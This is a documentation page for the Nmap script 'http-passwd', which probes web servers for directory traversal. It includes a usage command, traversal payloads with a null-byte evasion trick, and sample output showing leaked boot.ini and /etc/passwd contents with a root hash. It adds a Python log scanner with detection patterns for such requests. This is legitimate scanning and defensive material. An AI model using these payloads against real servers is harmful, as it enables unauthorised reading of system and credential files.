http-passwd
Script type: portrule
Categories: intrusive, vuln
Script download: http://nmap.org/svn/scripts/http-passwd.nse
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
The script uses several techniques:
../../../../etc/passwd.
http-passwd.root.
Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.
Example usage
nmap --script http-passwd --script-args http-passwd.root=/test/ <target>
80/tcp open http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

80/tcp open http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false
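
A detection-side view of the requests described above, as an added example that is not part of the original page or of the Nmap project: a Python pass over web access logs that flags dot-dot segments, an encoded null byte and the two target file names after repeated URL-decoding. The log lines, regexes and function names are constructed for illustration and assume the common combined log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.66 - - [01/Jan/2024:10:00:01 +0000] "GET /../../../../etc/passwd HTTP/1.1" 400 0
192.0.2.66 - - [01/Jan/2024:10:00:02 +0000] "GET /test/index.html?../../../../../boot.ini%00 HTTP/1.1" 200 250
192.0.2.66 - - [01/Jan/2024:10:00:03 +0000] "GET /%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
192.0.2.11 - - [01/Jan/2024:10:00:04 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')
# ".." counts only as a whole path or query segment, so "a..b" is not flagged.
DOTDOT_RE = re.compile(r'(?:^|[/\\?=&])\.\.(?:[/\\]|$)')
TARGET_RE = re.compile(r'etc[/\\]passwd|boot\.ini', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> '.'), bounded in rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return the reasons a request target looks like a traversal probe."""
    decoded = fully_decode(target)
    reasons = []
    if DOTDOT_RE.search(decoded):
        reasons.append("dot-dot segment")
    if "\x00" in decoded:
        reasons.append("encoded null byte")
    if TARGET_RE.search(decoded):
        reasons.append("sensitive file name")
    return reasons

def scan(log_text):
    """Yield one finding per suspicious request; 'served' marks a 200 with a body."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status, size = match.groups()
        reasons = classify(target)
        if reasons:
            served = status == "200" and size not in ("0", "-")
            findings.append({"client": client, "target": target,
                             "served": served, "reasons": reasons})
    return findings
```

Findings with `served` set are the ones to triage first, since the server answered a traversal-shaped request with a 200 and a non-empty body.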
Author: Kris Katterjohn, Ange Gutek
License: compiled by VER007, http://www.ver007.com